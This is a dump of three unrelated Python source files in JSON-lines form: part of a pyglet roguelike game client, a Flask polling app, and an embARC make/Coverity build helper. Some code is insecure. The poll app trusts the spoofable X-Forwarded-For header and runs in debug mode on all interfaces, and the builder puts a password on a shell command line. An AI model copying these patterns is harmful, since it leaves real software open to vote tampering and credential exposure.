            self[2, 1] = glooey.Label("Traits:")
            self[2, 2] = glooey.Label("Skills:")
            self[3, 0] = CharacterGenerationScrollBox()
            self[3, 1] = CharacterGenerationScrollBox()
            self[3, 2] = CharacterGenerationScrollBox()

        # nameLabel - nameInputBox - genderLabel - genderInputBox
        # professionLabel - selectedProfession - scenarioLabel - selectedScenario
        # statsLabel - TraitsLabel - SkillsLabel
        # statsScrollbox - TraitsScrollbox - SkillsScrollBox
    def __init__(self):
        """Build the main game view: a background with a 13x13 tile grid stacked on top."""
        super().__init__()

        self.chunk_size = (13, 13)  # the only tuple you'll see I swear.

        # 13x13 grid of 32x32-pixel cells — one cell per visible map tile.
        self.map_grid = glooey.Grid(
            self.chunk_size[0], self.chunk_size[1], 32, 32
        )  # chunk_size + tilemap size
        self.map_grid.set_left_padding(32)  # for the border.
        self.map_grid.set_top_padding(32)

        for i in range(
            self.chunk_size[0]
        ):  # glooey uses x,y for grids from the top left.
            for j in range(self.chunk_size[1]):
                self.map_grid.add(
                    i, j, glooey.images.Image(pyglet.resource.texture("t_grass.png"))
                )  # before we get an update we need to init the map with grass.

        # insert the background into our ordered groups.
        self.insert(CustomBackground(), 0)

        # insert the map_grid into our ordered group.
        self.insert(self.map_grid, 1)

        # TODO: lerp the positions of creatures from one frame to the next.
        # self.old_map = self.localmap

        # our keep-alive event. without this the server would disconnect if we
        # don't send data within the timeout for the server. (usually 60 seconds)
        # clock.schedule_interval(self.ping, 30.0)
(usually 60 seconds)\n # clock.schedule_interval(self.ping, 30.0)\n\n def ping(self, dt):\n command = Command(client.character.name, \"ping\")\n client.send(command)\n\n def find_character_in_localmap(self):\n for tile in self.localmap:\n if tile[\"creature\"] is not None:\n if tile[\"creature\"].name == self.character.name:\n return tile[\"creature\"]\n else:\n print(\"couldn't find character\")\n\n def convert_chunks_to_localmap(self, list_of_chunks):\n tiles = []\n for chunk in list_of_chunks:\n for tile in chunk.tiles:\n tiles.insert(len(tiles), tile)\n return tiles\n\n def lerp(self, start, end, t):\n return start + t * (end - start)\n\n def lerp_point(self, p0, p1, t):\n return (int(self.lerp(p0[0], p1[0], t)), int(self.lerp(p0[1], p1[1], t)))\n\n def diagonal_distance(self, p0, p1):\n dx = p1[0] - p0[0]\n dy = p1[1] - p0[1]\n return max(abs(dx), abs(dy))\n\n def line(self, p0, p1):\n points = []\n diagonal_distance = self.diagonal_distance(p0, p1)\n for step in range(diagonal_distance):\n points.append(self.lerp_point(p0, p1, step / diagonal_distance))\n return points # so now we have a set of points along a line.\n\n def trim_localmap(self, origin_position, radius=10):\n # origin_position = origin_position # store the player position for fov origin\n # convert chunks to grid\n level = defaultdict(dict)\n for tile in self.localmap[:]: # we only need the tiles around radius.\n if (\n int(tile[\"position\"].x) < origin_position.x - radius\n or int(tile[\"position\"].x) > origin_position.x + radius + 1\n ):\n self.localmap.remove(tile)\n elif (\n int(tile[\"position\"].y) < origin_position.y - radius\n or int(tile[\"position\"].y) > origin_position.y + radius + 1\n ):\n self.localmap.remove(tile)\n else:\n level[str(tile[\"position\"].x)][str(tile[\"position\"].y)] = tile[\n \"terrain\"\n ].impassable # so either remove a tile or figure out if it's impassable.\n\n # draw a line to each edge of the viewport using grid_edges\n # x's include top row and bottom 
rows, y's include min and max of viewport.\n grid_edges = []\n # now we have a level grid. let's get our edges so we can plot lines from origin to edge.\n for x in range(origin_position.x - radius, origin_position.x + radius + 1): # X\n grid_edges.append((x, origin_position.y - radius))\n grid_edges.append((x, origin_position.y + radius))\n for y in range(origin_position.y - radius, origin_position.y + radius + 1): # Y\n grid_edges.append((origin_position.x - radius, y))\n grid_edges.append((origin_position.x + radius, y))\n # print('grid_edges: ' + str(len(grid_edges)))\n\n tiles_to_keep = []\n # now we need to remove tiles which are out of our field of view.\n for destination in grid_edges:\n for point in self.line((origin_position.x, origin_position.y), destination):\n if level[str(point[0])][str(point[1])] == True: # (impassable)\n tiles_to_keep.append(\n point\n ) # do this to keep the blocking wall visible.\n break # hit a wall. move on to the next ray.\n else:\n tiles_to_keep.append(point)\n\n for tiles in self.localmap[:]: # iterate a copy to remove correctly.\n for point in tiles_to_keep:\n if tiles[\"position\"].x == point[0] and tiles[\"position\"].y == point[1]:\n break\n else:\n self.localmap.remove(tiles)\n\n def update_map_for_position(self, position):\n if self.localmap is not None:\n # our map_grid is 13x13 but our localmap contains 13*3 x 13*3 tiles worth of chunks so we need\n # to draw the viewport from the position only 13x13\n position = self.convert_position_to_local_coords(position)\n # first set terrain to the terrain image\n for tile in self.localmap:\n _pos = self.convert_position_to_local_coords(\n tile[\"position\"]\n ) # (0-38, 0-38)\n x = _pos.x - position.x + 6\n y = _pos.y - position.y + 6\n if x < 0 or x > 12:\n continue\n if y < 0 or y > 12:\n continue\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"terrain\"].ident + \".png\")\n ) # must be (0-12, 0-12)\n\n # then overlay furniture on that.\n if 
tile[\"furniture\"] is not None:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"furniture\"].ident + \".png\")\n )\n\n # then overlay items on that.\n if tile[\"items\"] is not None and len(tile[\"items\"]) > 0:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"items\"][0].ident + \".png\")\n ) # just show the first item\n\n # then overlay creatures on that.\n if tile[\"creature\"] is not None:\n self.map_grid[x, y].set_image(\n pyglet.resource.texture(tile[\"creature\"].tile_ident + \".png\")\n )\n\n # print(\"FPS:\", pyglet.clock.get_fps())\n\n def convert_position_to_local_coords(self, position):\n # local coordinates are always from (0,0) to (chunk.size[1] * 3 , chunk.size[0] * 3)\n # and must return a position within that size.\n x = position.x\n y = position.y\n z = position.z\n\n while x >= self.chunk_size[0] * 3:\n x = x - self.chunk_size[0] * 3\n while y >= self.chunk_size[1] * 3:\n y = y - self.chunk_size[1] * 3\n\n return Position(x, y, z)\n\n def draw_view_at_position(self, draw_position):\n self.trim_localmap(draw_position) # update field of view and lighting\n\n # at this point the localmap should've been trimmed of unseeable tiles. 
draw what's left at position.\n for tile in self.localmap: # draw the localmap for the controlling player.\n terrain = tile[\"terrain\"]\n position = tile[\"position\"] # Position(x, y, z)\n creature = tile[\"creature\"] # Creature()\n furniture = tile[\"furniture\"] # Furniture()\n items = tile[\"items\"] # list [] of Item()\n light_intensity = tile[\"lumens\"]\n\n fg = self.TileManager.TILE_TYPES[terrain.ident][\"fg\"]\n bg = self.TileManager.TILE_TYPES[terrain.ident][\"bg\"]\n\n x = (\n draw_position.x - position.x - (self.chunk_size[0] // 2)\n ) # offset to put position in middle of viewport\n y = (\n draw_position.y - position.y - (self.chunk_size[1] // 2)\n ) # offset to put position in middle of viewport\n\n \"\"\"# first blit terrain\n \n # then blit furniture\n \n\n # then blit items (if there is a pile of items check and see if any are blueprints. if so show those.)\n if(len(items) > 0):\n for item in items:\n # always show blueprints on top.\n else:\n # only display the first item \n \n # then blit vehicles\n\n # then blit player and creatures and monsters (all creature types)\n \"\"\"\n # darken based on lumen level of the tile\n # light_intensity # 10 is max light level although lumen level may be higher.\n # light_intensity = min(int((255-(light_intensity*25))/3), 255)\n # light_intensity = max(light_intensity, 0)\n # self.screen.fill((light_intensity, light_intensity, light_intensity), rect=(x*24, y*24, 24, 24), special_flags=pygame.BLEND_SUB)\n\n # render debug text\n\n # then blit weather. Weather is the only thing above players and creatures.\n # TODO: blit weather\n\n def open_crafting_menu(self):\n list_of_known_recipes = []\n for (\n key,\n value,\n ) in (\n self.RecipeManager.RECIPE_TYPES.items()\n ): # TODO: Don't just add them all. 
Pull them from creature.known_recipes\n list_of_known_recipes.append(value)\n\n def open_movement_menu(self, pos, tile):\n # _command = Command(client.character.name, 'calculated_move', (tile['position'].x, tile['position'].y, tile['position'].z))\n # send calculated_move action to server and give it the position of the tile we clicked.\n # return _command\n pass\n\n def open_super_menu(self, pos, tile):\n pass\n\n def open_blueprint_menu(self, pos, tile):\n # blueprint_menu = Blueprint_Menu(self.screen, (0, 0, 400, 496), self.FontManager, self.TileManager)\n pass\n\n def open_equipment_menu(self):\n # equipment_menu = Equipment_Menu(self.screen, (0, 0, 400, 496), self.FontManager, self.TileManager, self.character.body_parts)\n pass\n\n def open_items_on_ground(self, pos, tile):\n # _command = Command(self.character.name, 'move_item_to_player_storage', (tile['position'].x, tile['position'].y, tile['position'].z, item.ident)) # ask the server to pickup the item by ident. #TODO: is there a better way to pass it to the server without opening ourselves up to cheating?\n # return _command\n pass\n\n\nclass Client(MastermindClientTCP): # extends MastermindClientTCP\n def __init__(self):\n self.state = \"login\" # character_select, character_gen, main\n MastermindClientTCP.__init__(self)\n\n self.window = pyglet.window.Window(896, 498)\n self.client_name = ''\n\n pyglet.gl.glEnable(pyglet.gl.GL_BLEND)\n pyglet.gl.glBlendFunc(pyglet.gl.GL_SRC_ALPHA, pyglet.gl.GL_ONE_MINUS_SRC_ALPHA)\n\n self.gui = glooey.Gui(self.window)\n\n self.bg = glooey.Background()\n self.bg.set_appearance(\n center=pyglet.resource.texture(\"center.png\"),\n top=pyglet.resource.texture(\"top.png\"),\n bottom=pyglet.resource.texture(\"bottom.png\"),\n left=pyglet.resource.texture(\"left.png\"),\n right=pyglet.resource.texture(\"right.png\"),\n top_left=pyglet.resource.texture(\"top_left.png\"),\n top_right=pyglet.resource.texture(\"top_right.png\"),\n 
bottom_left=pyglet.resource.texture(\"bottom_left.png\"),\n bottom_right=pyglet.resource.texture(\"bottom_right.png\"),\n )\n\n self.gui.add(self.bg)\n\n self.TileManager = TileManager\n self.ItemManager = ItemManager\n self.RecipeManager = RecipeManager\n\n # TODO: make new hotbar in pyglet.\n self.hotbars = []\n\n self.LoginWindow = LoginWindow()\n self.LoginWindow.grid[6, 1].push_handlers(on_click=self.login) # Connect Button\n\n self.gui.add(self.LoginWindow)\n\n self.character = None\n self.localmap = None\n\n # init but don't show the window\n self.mainWindow = mainWindow\n\n # if we recieve an update from the server process it. do this first.\n # We always start out at the login window.\n # once we recieve a list of characters SWITCH to the character select view.\n # once the user selects a character ask the server to login into the world with it.\n # once we recieve a world state SWITCH to the mainWindow. client.character and localmap should be filled.\n def check_messages_from_server(self, dt):\n # commands recieved while in the login window\n next_update = client.receive(False)\n if self.state == \"login\":\n # we recieved a message from the server. 
let's process it.\n if next_update is not None:\n print(\"--next_update in login--\")\n print(type(next_update))\n if isinstance(next_update, list):\n # list of characters.\n print(\"list:\", next_update)\n # open the character select screen.\n self.gui.clear()\n self.gui.add(CustomBackground())\n self.CharacterSelectWindow = CharacterSelectWindow(next_update)\n self.CharacterSelectWindow.create_button.push_handlers(\n on_click=self.create_new_character\n )\n self.gui.add(self.CharacterSelectWindow)\n self.state = \"character_select\"\n\n if isinstance(next_update, str):\n if next_update == \"disconnect\":\n self.disconnect()\n return\n\n if isinstance(next_update, str):\n print(next_update)\n # server sent salt\n _hashedPW = hashPassword(\n self.LoginWindow.password.text, next_update\n )\n command = Command(\n self.LoginWindow.username.text,\n \"hashed_password\",\n [str(_hashedPW)],\n )\n # send back hashed password.\n self.send(command)\n\n if self.state == \"character_select\":\n if next_update is not None:\n print(\"--next_update in character_select--\")\n if isinstance(next_update, list):\n # list of characters.\n print(\"list:\", next_update)\n # re-fresh the character select screen.\n self.gui.clear()\n\n self.gui.add(CustomBackground())\n self.CharacterSelectWindow = CharacterSelectWindow(next_update)\n self.CharacterSelectWindow.create_button.push_handlers(\n on_click=self.create_new_character\n )\n self.gui.add(self.CharacterSelectWindow)\n for button in self.CharacterSelectWindow.vbox_for_characterlist:\n if button.text != \"Create a Character\":\n button.push_handlers(\n on_click=lambda w: self.choose_character(w.text)\n )\n\n if self.state == \"main\":\n self.gui.clear()\n self.gui.add(self.mainWindow())\n print(\"--in state main--\")\n print(self.localmap)\n if next_update is not None:\n print(\"next_update in main\", next_update)\n # we recieved a localmap from the server.\n self.localmap = jsonpickle.decode(next_update)\n\n if self.state == 
\"character_gen\":\n if next_update is not None:\n print(\"--next_update in character_gen--\")\n # print(next_update)\n\n def choose_character(self, name):\n self.state = \"main\"\n command = Command(self.client_name, \"choose_character\", [name])\n self.send(command)\n\n def create_new_character(self, dt):\n # switch to the character generation screen\n self.gui.clear()\n\n # init a blank character for us to send.\n self.character = Character()\n\n self.gui.add(CustomBackground())\n self.CharacterGenerationWindow = CharacterGenerationWindow()\n self.CharacterGenerationWindow.finish_button.push_handlers(\n on_click=self.send_completed_character\n )\n\n self.gui.add(self.CharacterGenerationWindow)\n self.state = \"character_gen\"\n\n def send_completed_character(self, dt):\n # gather up all the character info from the chargen window and send it. the 'commit' button\n\n self.character.name = self.CharacterGenerationWindow.main_frame.get_child()[0, 1].text\n self.character.gender = self.CharacterGenerationWindow.main_frame.get_child()[0, 3].text\n _data = jsonpickle.encode(self.character)\n\n # set this before sending the command to keep things in order.\n self.state = \"character_select\"\n\n command = Command(self.client_name, \"completed_character\", [_data])\n self.send(command)\n # go back to the charcterSelectWindow and update it with the new character and let them select it.\n\n def login(self, dt):\n # we'll do the below to login and recieve a list of characters.\n self.connect(\n self.LoginWindow.serverIP.text, int(self.LoginWindow.serverPort.text)\n )\n\n # set our client_name for future sending.\n self.client_name = self.LoginWindow.username.text \n \n command = Command(self.LoginWindow.username.text, \"login\", [\"noargs\"])\n self.send(command)\n # -------------------------------------------------------\n clock.schedule_interval(self.check_messages_from_server, 0.1)\n\n # our keep-alive event. 
without this the server would disconnect if we don't send data within the timeout for the server. (usually 60 seconds)\n # clock.schedule_interval(self.ping, 30.0)\n def ping(self, dt):\n command = Command(self.username, \"ping\")\n client.send(command)\n\n\n#\n# if we start a client directly\n#\nif __name__ == \"__main__\":\n\n client = Client()\n\n pyglet.app.event_loop.run() # main event loop starts here.\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":36104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417891784","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\nimport time\nfrom flask import *\n\napp = Flask(__name__)\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'db/main.db'),\n HOST='0.0.0.0',\n DEBUG=True,\n SECRET_KEY=os.urandom(24)\n))\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardown_request(exception):\n g.db.close()\n\n\ndef query_db(query, args=(), one=False):\n cur = g.db.execute(query, args)\n rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/polls/', methods=['GET'])\ndef poll(id):\n p = query_db('select * from polls where id = ?', [id], one=True)\n if p is None:\n abort(404)\n ip = request.remote_addr\n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n v = query_db('select * from votes where poll_id = ? 
@app.route('/polls', methods=['POST'])
def create():
    """Create a new poll from the submitted form and redirect to it.

    Reads 'question' plus numbered 'option-1', 'option-2', ... fields
    (stopping at the first missing one), inserts the poll and its
    non-empty options, then redirects to the poll page.
    """
    question = request.form.get('question', '')
    # Collect options in submission order. A list (not a dict) guarantees
    # the stored option numbers follow the form order regardless of dict
    # ordering, and each field is looked up once instead of twice.
    options = []
    i = 1
    while True:
        option = request.form.get('option-' + str(i))
        if option is None:
            break
        if option != "":
            options.append(option)
        i += 1
    cur = g.db.cursor()
    cur.execute('insert into polls (question, is_multi, create_at) VALUES (?, ?, ?)',
                [question, False, int(time.time())])
    # lastrowid is valid before commit; deferring the commit makes the poll
    # and its options land atomically instead of in two transactions.
    row_id = cur.lastrowid
    for idx, content in enumerate(options, start=1):
        g.db.execute('insert into options (poll_id, option, content) VALUES (?, ?, ?)',
                     [row_id, idx, content])
    g.db.commit()
    return redirect(url_for('poll', id=row_id))
and option = ?', [v['voters'] + 1, id, option])\n g.db.commit()\n return redirect(url_for(\"poll\", id=id))\n\n\n@app.route('/ip', methods=['GET'])\ndef ip():\n ip = \"\"\n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n ip = request.remote_addr\n return str(ip)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413502797","text":"from __future__ import print_function, unicode_literals\nimport sys\nimport os\nimport time\nimport collections\nfrom ..settings import BUILD_CONFIG_TEMPLATE, BUILD_OPTION_NAMES, BUILD_INFO_NAMES, BUILD_CFG_NAMES, BUILD_SIZE_SECTION_NAMES, get_config, MAKEFILENAMES\nfrom ..utils import mkdir, delete_dir_files, cd, generate_json, pqueryOutputinline, pqueryTemporaryFile\nfrom ..notify import (print_string, print_table)\nfrom ..osp import osp\nfrom ..builder import secureshield\n\n\nclass embARC_Builder(object):\n def __init__(self, osproot=None, buildopts=None, outdir=None, embarc_config=\"embarc_app.json\"):\n self.buildopts = dict()\n make_options = ' '\n if osproot is not None and os.path.isdir(osproot):\n self.osproot = os.path.realpath(osproot)\n self.buildopts[\"EMBARC_OSP_ROOT\"] = self.osproot\n # make_options += 'EMBARC_ROOT=' + str(self.osproot) + ' '\n else:\n self.osproot = None\n if outdir is not None:\n self.outdir = os.path.realpath(outdir)\n make_options += 'OUT_DIR_ROOT=' + str(self.outdir) + ' '\n else:\n self.outdir = None\n\n if buildopts is not None:\n self.buildopts.update(buildopts)\n self.make_options = make_options\n self.embarc_config = embarc_config\n\n @staticmethod\n def is_embarc_makefile(app):\n with open(app) as f:\n embarc_root = False\n appl = False\n lines = f.read().splitlines()\n for line in lines:\n if \"EMBARC_ROOT\" in line:\n embarc_root = 
True\n if \"APPL\" in line:\n appl = True\n if embarc_root and appl:\n return True\n return False\n\n @staticmethod\n def build_common_check(app):\n build_status = {'result': True, 'reason': ''}\n app_normpath = os.path.normpath(app)\n if not os.path.isdir(app_normpath):\n build_status['reason'] = 'Application folder doesn\\'t exist!'\n build_status['result'] = False\n current_makefile = None\n for makename in MAKEFILENAMES:\n if makename in os.listdir(app_normpath):\n current_makefile = os.path.join(app_normpath, makename)\n break\n if not current_makefile:\n build_status['reason'] = 'Application makefile donesn\\'t exist!'\n build_status['result'] = False\n else:\n if not embARC_Builder.is_embarc_makefile(current_makefile):\n build_status['reason'] = 'Application makefile is invalid!'\n build_status['result'] = False\n\n app_realpath = os.path.realpath(app_normpath)\n build_status['app_path'] = app_realpath\n\n return app_realpath, build_status\n\n def configCoverity(self, toolchain):\n print_string(\"Config coverity\")\n build_status = {'result': True, 'reason': ''}\n self.coverity_comptype = 'gcc'\n self.coverity_compiler = 'arc-elf32-gcc'\n if toolchain == \"gnu\":\n pass\n elif toolchain == \"mw\":\n self.coverity_comptype = 'clangcc'\n self.coverity_compiler = 'ccac'\n else:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Toolchian is not supported!\"\n return build_status\n self.coverity_sa_version = os.environ.get(\"COVERITY_SA_VERSION\", None)\n self.coverity_server = os.environ.get(\"COVERITY_SERVER\", None)\n self.user = os.environ.get(\"AUTO_USER\", None)\n self.password = os.environ.get(\"AUTO_PASSWORD\", None)\n self.coverity_steam_pre = os.environ.get(\"COVERITY_STREAM_PRE\", None)\n return build_status\n\n def _setCoverityDirs(self, app):\n app_path_list = app.split(\"/\")\n self.coverity_steam = self.coverity_steam_pre + \"_\".join(app_path_list[1:])\n # print_string(\"The coverity stream: {} {} {} 
\".format(self.coverity_steam))\n self.coverity_data_dir = os.environ.get(\"COVERITY_DATA_DIR\", \"coverity-data\")\n self.coverity_config = os.path.join(self.coverity_data_dir, \"coverity-config.xml\")\n self.coverity_html = \"coverity_html\"\n if os.path.exists(self.coverity_data_dir):\n delete_dir_files(self.coverity_data_dir, dir=True)\n mkdir(self.coverity_data_dir)\n if os.path.exists(self.coverity_html):\n delete_dir_files(self.coverity_html, dir=True)\n\n def build_coverity(self, make_cmd):\n build_status = {'result': True, 'reason': ''}\n print_string(\"BEGIN SECTION Configure Coverity to use the built-incompiler\")\n config_compilercmd = \"cov-configure --config {} --template --comptype {} --compiler {}\".format(\n self.coverity_config,\n self.coverity_comptype, self.coverity_compiler\n )\n returncode = os.system(config_compilercmd)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Configure Coverity Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Build with Coverity {}\".format(self.coverity_sa_version))\n coverity_build = \"cov-build --config %s --dir %s %s\" % (self.coverity_config, self.coverity_data_dir, make_cmd)\n try:\n build_proc = pqueryOutputinline(coverity_build, console=True)\n build_status['build_msg'] = build_proc\n except Exception as e:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Build with Coverity Failed! 
{}\".format(e)\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Analyze Defects\")\n coverity_analyze = \"cov-analyze --dir {}\".format(self.coverity_data_dir)\n returncode = os.system(coverity_analyze)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Analyze Defects Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Format Errors into HTML\")\n coverity_errors = \"cov-format-errors --dir %s -x -X --html-output %s\" % (self.coverity_data_dir, self.coverity_html)\n returncode = os.system(coverity_errors)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Format Errors into HTML Failed!\"\n return build_status\n\n print_string(\"BEGIN SECTION Coverity Commit defects to {} steam {}\".format(self.coverity_server, self.coverity_steam))\n coverity_commit = \"cov-commit-defects --dir %s --host %s --stream %s --user %s --password %s\" % (\n self.coverity_data_dir,\n self.coverity_server, self.coverity_steam, self.user, self.password\n )\n returncode = os.system(coverity_commit)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \"Coverity Commit defects Failed!\"\n return build_status\n\n '''print_string(\"BEGIN SECTION Coverity Send E-mail Notifications\")\n coverity_manage = \"cov-manage-im --mode notification --execute --view 'Default' --host %s --user %s --password %s\" % (\n self.coverity_server,\n self.user, self.password\n )\n returncode = os.system(coverity_manage)\n if returncode != 0:\n build_status[\"result\"] = False\n build_status[\"reason\"] = \" Coverity Send E-mail Notifications Failed!\"\n return build_status'''\n\n return build_status\n\n def get_build_cmd(self, app, target=None, parallel=8, silent=False):\n build_status = dict()\n build_precmd = \"make \"\n if parallel:\n build_precmd = \"{} -j {}\".format(build_precmd, str(parallel))\n\n if target != \"info\":\n build_config_template = 
self.get_build_template()\n with cd(app):\n self.get_makefile_config(build_config_template)\n build_precmd = \"{} {}\".format(build_precmd, self.make_options)\n if silent:\n if \"SILENT=1\" not in build_precmd:\n build_precmd = \"{} SILENT=1 \".format(build_precmd)\n if isinstance(target, str) or target is not None:\n build_cmd = build_precmd + \" \" + str(target)\n else:\n build_status['reason'] = \"Unrecognized build target\"\n build_status['result'] = False\n return build_status\n build_cmd_list = build_cmd.split()\n for i in range(len(build_cmd_list)):\n if build_cmd_list[i].startswith(\"EMBARC_ROOT\"):\n build_cmd_list[i] = \"EMBARC_ROOT=\" + self.osproot\n break\n build_cmd = \" \".join(build_cmd_list)\n print_string(\"Build command: {} \".format(build_cmd))\n build_status['build_cmd'] = build_cmd\n return build_status\n\n def build_target(self, app, target=None, parallel=8, coverity=False, silent=False):\n app_realpath, build_status = self.build_common_check(app)\n build_status['build_target'] = target\n build_status['time_cost'] = 0\n print_string(\"Build target: {} \" .format(target))\n\n if not build_status['result']:\n return build_status\n\n # Check and create output directory\n if (self.outdir is not None) and (not os.path.isdir(self.outdir)):\n print_string(\"Create application output directory: \" + self.outdir)\n os.makedirs(self.outdir)\n\n current_build_cmd = self.get_build_cmd(app_realpath, target, parallel, silent)\n build_status.update(current_build_cmd)\n build_cmd = build_status.get('build_cmd', None)\n\n def start_build(build_cmd, build_status=None):\n print_string(\"Start to build application\")\n return_code = 0\n time_pre = time.time()\n if coverity:\n with cd(app_realpath):\n self._setCoverityDirs(app)\n coverity_build_status = self.build_coverity(build_cmd)\n if not coverity_build_status[\"result\"]:\n build_status[\"result\"] = False\n build_status[\"reason\"] = coverity_build_status[\"reason\"]\n build_status[\"build_msg\"] = 
coverity_build_status[\"build_msg\"]\n else:\n build_status[\"build_msg\"] = [\"Build Coverity successfully\"]\n else:\n if target not in [\"opt\", \"info\", \"size\", \"all\"]:\n with cd(app_realpath):\n try:\n return_code = os.system(build_cmd)\n if return_code == 0:\n build_status[\"build_msg\"] = [\"Build successfully\"]\n else:\n build_status[\"build_msg\"] = [\"Build failed\"]\n build_status['result'] = False\n build_status[\"reason\"] = \"ProcessError: Run command {} failed\".format(build_cmd)\n except (KeyboardInterrupt):\n print_string(\"Terminate batch job\", \"warning\")\n sys.exit(1)\n else:\n try:\n build_proc = pqueryOutputinline(build_cmd, cwd=app, console=True)\n build_status['build_msg'] = build_proc\n except Exception as e:\n print(\"Run command({}) failed! {} \".format(build_cmd, e))\n build_status[\"build_msg\"] = [\"Build failed\"]\n build_status[\"reason\"] = \"ProcessError: Run command {} failed\".format(build_cmd)\n build_status['result'] = False\n build_status['time_cost'] = (time.time() - time_pre)\n return build_status\n\n secureshield_config = secureshield.common_check(\n self.buildopts[\"TOOLCHAIN\"], self.buildopts[\"BOARD\"], app_realpath)\n if secureshield_config:\n with secureshield.secureshield_appl_cfg_gen(self.buildopts[\"TOOLCHAIN\"], secureshield_config, app_realpath):\n build_cmd_list = build_cmd.split()\n target = build_cmd_list[-1]\n build_cmd_list[-1] = \"USE_SECURESHIELD_APPL_GEN=1\"\n build_cmd_list.append(target)\n build_cmd = \" \".join(build_cmd_list)\n build_status = start_build(build_cmd, build_status)\n else:\n build_status = start_build(build_cmd, build_status)\n print_string(\"Completed in: ({})s \".format(build_status['time_cost']))\n return build_status\n\n def get_build_info(self, app, parallel=False):\n build_status = self.build_target(app, target=str('opt'), parallel=parallel)\n if not build_status['result']:\n return build_status\n\n build_cfg = dict()\n cfg_lines = build_status['build_msg']\n\n for cfg_line 
in cfg_lines:\n words = cfg_line.split(':')\n if len(words) == 2:\n key = words[0].strip()\n value = words[1].strip()\n if key in BUILD_CFG_NAMES or key in BUILD_OPTION_NAMES:\n build_cfg[key] = value\n\n build_status['build_cfg'] = build_cfg\n\n # Get Build Info\n info_status = self.build_target(app, target=str('info'))\n build_out = info_status['build_msg']\n build_info = dict()\n if info_status['result']:\n for info_line in build_out:\n words = info_line.split(':')\n if len(words) == 2:\n key = words[0].strip()\n value = words[1].strip()\n if key in BUILD_INFO_NAMES:\n build_info[key] = value\n if key == 'BUILD_OPTION':\n build_cfgs_dict = value.split()\n for cfg_dict in build_cfgs_dict:\n cfg_pair = cfg_dict.split('=')\n if len(cfg_pair) == 2 and cfg_pair[0] in BUILD_OPTION_NAMES:\n build_status['build_cfg'][cfg_pair[0]] = cfg_pair[1]\n if key == 'MIDDLEWARE' or key == 'PERIPHERAL':\n build_info[key + 'S'] = value.split()\n if key == 'APPLICATION_ELF':\n build_info['APPLICATION_OUTDIR'] = os.path.dirname(value)\n build_status['build_info'] = build_info\n\n app_realpath = build_status['app_path']\n if 'EMBARC_ROOT' in build_status['build_cfg']:\n if not os.path.isabs((build_status['build_cfg']['EMBARC_ROOT'])):\n build_status['build_cfg']['EMBARC_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_cfg']['EMBARC_ROOT']))\n if 'OUT_DIR_ROOT' in build_status['build_cfg']:\n if not os.path.isabs(build_status['build_cfg']['OUT_DIR_ROOT']):\n build_status['build_cfg']['OUT_DIR_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_cfg']['OUT_DIR_ROOT']))\n if 'OUT_DIR_ROOT' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['OUT_DIR_ROOT']):\n build_status['build_info']['OUT_DIR_ROOT'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['OUT_DIR_ROOT']))\n if 'APPLICATION_ELF' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_ELF']):\n 
build_status['app_elf'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_ELF']))\n else:\n build_status['app_elf'] = build_status['build_info']['APPLICATION_ELF']\n if 'APPLICATION_HEX' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_HEX']):\n build_status['app_hex'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_HEX']))\n else:\n build_status['app_hex'] = build_status['build_info']['APPLICATION_HEX']\n if 'APPLICATION_BIN' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_BIN']):\n build_status['app_bin'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_BIN']))\n else:\n build_status['app_bin'] = build_status['build_info']['APPLICATION_BIN']\n if 'APPLICATION_OUTDIR' in build_status['build_info']:\n if not os.path.isabs(build_status['build_info']['APPLICATION_OUTDIR']):\n build_status['app_outdir'] = os.path.realpath(os.path.join(app_realpath, build_status['build_info']['APPLICATION_OUTDIR']))\n else:\n build_status['app_outdir'] = build_status['build_info']['APPLICATION_OUTDIR']\n\n return build_status\n\n def build_elf(self, app, parallel=False, pre_clean=False, post_clean=False, silent=False):\n # Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('all'), 